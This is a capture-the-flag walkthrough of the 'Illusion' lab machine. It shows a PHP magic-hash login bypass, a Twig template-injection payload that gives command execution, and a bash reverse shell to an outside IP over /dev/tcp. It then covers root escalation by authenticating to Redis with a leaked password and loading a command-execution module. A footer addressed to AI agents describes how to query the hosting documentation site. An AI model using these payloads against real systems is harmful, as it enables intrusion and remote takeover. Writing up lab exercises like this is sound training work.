# Illusion

## Gaining Access

Nmap scan:

```
$ nmap -p- --min-rate 3000 192.168.183.203
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 18:22 +08
Warning: 192.168.183.203 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.183.203
Host is up (0.17s latency).
Not shown: 65528 closed tcp ports (conn-refused)
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
```

We can start proxying traffic through Burp.

### Web Enum -> Magic Hashes

Port 80 presents a corporate web page with a Login:

<figure><img src="/files/aZnxcplwdFaGotRBr4qP" alt=""><figcaption></figcaption></figure>

The login page is basic and operates in PHP:

<figure><img src="/files/GhzTgxYFwQkTaXPy7BTW" alt=""><figcaption></figcaption></figure>

Default credentials don't work here. Brute forcing also doesn't work. Since this runs on PHP, we can try some Magic Hashes by submitting this request:

<figure><img src="/files/XQF6SixvFWVfQQ59Mhyz" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/README.md>" %}

This works because the `Location` header points to `dashboard.php` now.

### Orders -> SSTI

The dashboard is simple.

<figure><img src="/files/3pjmWMPmU63byw2g8iIy" alt=""><figcaption></figcaption></figure>

If we submit any queries, we can see our order name pop up on the top:

<figure><img src="/files/TF5b8eRrS3kHhZEhHnzl" alt=""><figcaption></figcaption></figure>

Since this website runs on PHP and the input value is printed out on screen, I wanted to test for SSTI by using `{{7*7}}` as the name of the order, and it works:

<figure><img src="/files/ui8uWrUydGtFNH1I2bVl" alt=""><figcaption></figcaption></figure>

On Hacktricks, there's a whole section for Twig (PHP), and I tried their payload to run `id`:

```
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
```

<figure><img src="/files/lroMI7nQ4ZLrnXcRQTb6" alt=""><figcaption></figcaption></figure>

This confirms that SSTI works and we have RCE on the machine. Sending this payload gets us a reverse shell:

```
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("bash -c 'bash -i >& /dev/tcp/192.168.45.208/4444 0>&1'")}}
```

<figure><img src="/files/3mE2DeWnltCobqgI3SO8" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### Redis Creds -> RCE

Within the user's directory, there was a Redis related file that contained a hash:

```
www-data@illusion:/home/james$ ls
local.txt  redis-openssl-gen-pass.txt
www-data@illusion:/home/james$ cat redis-openssl-gen-pass.txt 
sgm5ZgEsCrj4L/0fi/1XGUcGII2GTuAjo3eotCFNy6ZManKrLWQaRCTOE6QpyCojpyr+Rix12VYbdOkA
```

Checking the listening ports using `netstat` reveals that port 6379 is listening and is likely Redis:

```
www-data@illusion:/home/james$ netstat -tulpn
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:6379          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -   
```

We can port forward this using `chisel`. Afterwards, we can access the Redis database using `redis-cli`. Attempts to run commands fail because we aren't authenticated:

```
$ redis-cli -h 127.0.0.1
127.0.0.1:6379> INFO
NOAUTH Authentication required.
```

In this case, we can try the hash that we found earlier.

```
127.0.0.1:6379> AUTH sgm5ZgEsCrj4L/0fi/1XGUcGII2GTuAjo3eotCFNy6ZManKrLWQaRCTOE6QpyCojpyr+Rix12VYbdOkA
OK
127.0.0.1:6379> INFO
# Server
redis_version:6.2.6
<TRUNCATED>
```

There was nothing within the database that was interesting, but I did want to know who was running it. A quick `ps -elf` reveals that the `root` user is running it:

```
www-data@illusion:/home/james$ ps -elf |grep redis
5 S root         893       1  0  80   0 - 13071 -      10:21 ?        00:00:00 /usr/local/bin/redis-server 127.0.0.1:6379
0 S www-data    3221    3025  0  80   0 -  1625 pipe_w 10:37 pts/0    00:00:00 grep redis
```

Since `root` is running it and we can login, this means that we can also load any module that we want. This repository has a module that works:

{% embed url="<https://github.com/n0b0dyCN/RedisModules-ExecuteCommand>" %}

Compile and upload the `.so` file to the machine. Then, load it within `redis-cli`:

<figure><img src="/files/qARTVyEmDXw0bzhW6Oap" alt=""><figcaption></figcaption></figure>

We can get a reverse shell via `system.rev <IP> <PORT>`:

<figure><img src="/files/ZUuCCew4UgvJYdJoLGqU" alt=""><figcaption></figcaption></figure>

Rooted!


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://rouvin.gitbook.io/ibreakstuff/writeups/proving-grounds-practice/linux/illusion.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.